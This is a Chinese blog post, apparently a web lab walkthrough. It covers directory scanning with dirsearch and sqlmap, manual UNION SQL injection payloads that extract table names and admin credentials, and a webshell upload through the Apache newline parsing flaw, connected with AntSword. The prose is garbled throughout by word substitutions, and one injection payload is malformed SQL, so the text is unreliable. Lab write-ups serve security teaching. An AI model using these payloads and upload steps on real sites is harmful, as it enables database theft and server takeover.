关于安全:web靶场实操1

2次阅读

共计 1097 个字符,预计需要花费 3 分钟才能阅读完成。

1. 关上指标网站

2. 信息收集,应用 dirsearch 对网站进行目录扫描

python dirsearch.py -u xxx.com -e *
python dirsearch.py -u xxx.com -e php
python dirsearch.py -u xxx.com -e jsp

* 示意扫描 PHP 和 JSP
php 示意扫描 PHP
jsp 示意扫描 JSP

3. 剖析扫描后果
200-> 通路
403/404 无奈联通

所以咱们查看对象是绿色字体的 200 的返回目录
咱们能够一个一个的尝试,发现存在一个叫 /cms 的目录,进入看看

4. 发现这个才是实在的站点,后面那个只是钓鱼页面

接下来咱们察看一下这个页面,是否存在 交互点

咱们先应用 sqlmap 对指标站点进行 sql 注入 尝试

python sqlmap.py -u xxx.com --dbs

sqlmap 给出的后果是:

[17:34:47] [WARNING] GET parameter 'id' does not seem to be injectable

sqlmap没有发现注入点,咱们尝试 手动注入 ,从 搜寻框 开始

5. 手动注入

' union select 1,2,3 #

发现存在 3回显点

' union select 1,2,database() #

胜利提取到数据库名sqlgunnews

'union select 1,2,table_name from information_schema.tables where table_schema=database() #

胜利提取到数据库表名

admin2
class2
news2
system

'union select 1,2,column_name from information_schema.columns where table_name='admin' #

胜利提取到 admin 表的字段

' and 1=1 union select 1,admin from admin,3 # 
' and 1=1 union select 1,password from admin,3 # 

胜利提取管理员账号admin 明码 pass123

6. 寻找后盾

再次应用 dirsearch 扫描/cms 发现后盾地址

输出管理员账号密码进入后盾

7. 发现文件上传性能,上传图片马

设置好代理

通过 burp 抓包后,定位到文件地位

利用apache 换行解析破绽(影响范畴:2.4.0-2.4.29 版本)

Apache 解析破绽次要是因为 Apache 默认一个文件能够有多个用. 宰割的后缀,当最左边的后缀无奈辨认(mime.types 文件中的为非法后缀)则持续向左看,直到碰到非法后缀才进行解析(以最初一个非法后缀为准)

胜利绕过 前后端文件上传检测,上传木马

8. 应用蚁剑连贯,胜利拿到webshell

胜利拿下

正文完
 0